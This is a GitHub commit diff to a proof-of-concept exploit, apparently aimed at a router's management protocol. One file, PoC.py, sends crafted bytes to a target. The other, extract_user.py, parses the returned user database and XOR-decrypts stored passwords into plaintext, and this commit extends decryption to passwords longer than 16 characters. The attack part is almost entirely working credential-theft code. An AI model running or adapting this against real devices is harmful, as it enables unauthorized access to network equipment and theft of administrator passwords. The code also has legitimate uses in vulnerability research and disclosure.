Skip to content

Commit 97cb799

Browse files
BigNerd95BigNerd95
committed
Update extract_user to support passwords longer than 16 chars
1 parent d7154fc commit 97cb799

File tree

2 files changed

+30
-19
lines changed

2 files changed

+30
-19
lines changed

PoC.py

+2-2
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22

33
import socket
44
import sys
5-
from extract_user import get_from_network
5+
from extract_user import dump
66

77

88
a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
@@ -59,4 +59,4 @@
5959

6060
#Get results
6161
print(ip)
62-
get_from_network(d[55:])
62+
dump(d[55:])

extract_user.py

+28-17
Original file line numberDiff line numberDiff line change
@@ -7,45 +7,56 @@ def decrypt_password(user, pass_enc):
77

88
passw = ""
99
for i in range(0, len(pass_enc)):
10-
passw += chr(pass_enc[i] ^ key[i])
10+
passw += chr(pass_enc[i] ^ key[i % len(key)])
1111

1212
return passw.split("\x00")[0]
1313

14+
def extract_user_pass_from_entry(entry):
15+
user_data = entry.split(b"\x01\x00\x00\x21")[1]
16+
pass_data = entry.split(b"\x11\x00\x00\x21")[1]
17+
18+
user_len = user_data[0]
19+
pass_len = pass_data[0]
20+
21+
username = user_data[1:1 + user_len]
22+
password = pass_data[1:1 + pass_len]
23+
24+
return username, password
1425

1526
def get_pair(data):
1627

1728
user_list = []
1829

1930
entries = data.split(b"M2")[1:]
2031
for entry in entries:
21-
user_len = entry.split(b"\x01\x00\x00\x21")[1][0]
22-
pass_len = entry.split(b"\x11\x00\x00\x21")[1][0]
23-
24-
user = entry.split(b"\x01\x00\x00\x21")[1][1:1 + user_len]
25-
pass_enc = entry.split(b"\x11\x00\x00\x21")[1][1:1 + pass_len]
32+
try:
33+
user, pass_encrypted = extract_user_pass_from_entry(entry)
34+
except:
35+
continue
2636

27-
passw = decrypt_password(user, pass_enc)
37+
pass_plain = decrypt_password(user, pass_encrypted)
2838
user = user.decode("ascii")
2939

30-
user_list.append((user, passw))
40+
user_list.append((user, pass_plain))
3141

3242
return user_list
3343

34-
def get_from_network(pload):
35-
user_pass = get_pair(pload)
44+
def dump(data):
45+
user_pass = get_pair(data)
3646
for u, p in user_pass:
3747
print("User:", u)
3848
print("Pass:", p)
3949
print()
4050

4151
if __name__ == "__main__":
4252
if len(sys.argv) == 2:
43-
user_file = open(sys.argv[1], "rb").read()
44-
user_pass = get_pair(user_file)
45-
for u, p in user_pass:
46-
print("User:", u)
47-
print("Pass:", p)
48-
print()
53+
if sys.argv[1] == "-":
54+
user_file = sys.stdin.buffer.read()
55+
else:
56+
user_file = open(sys.argv[1], "rb").read()
57+
dump(user_file)
58+
4959
else:
5060
print("Usage:")
51-
print(sys.argv[0], "user.dat")
61+
print("\tFrom file: \t", sys.argv[0], "user.dat")
62+
print("\tFrom stdin:\t", sys.argv[0], "-")

0 commit comments

Comments
 (0)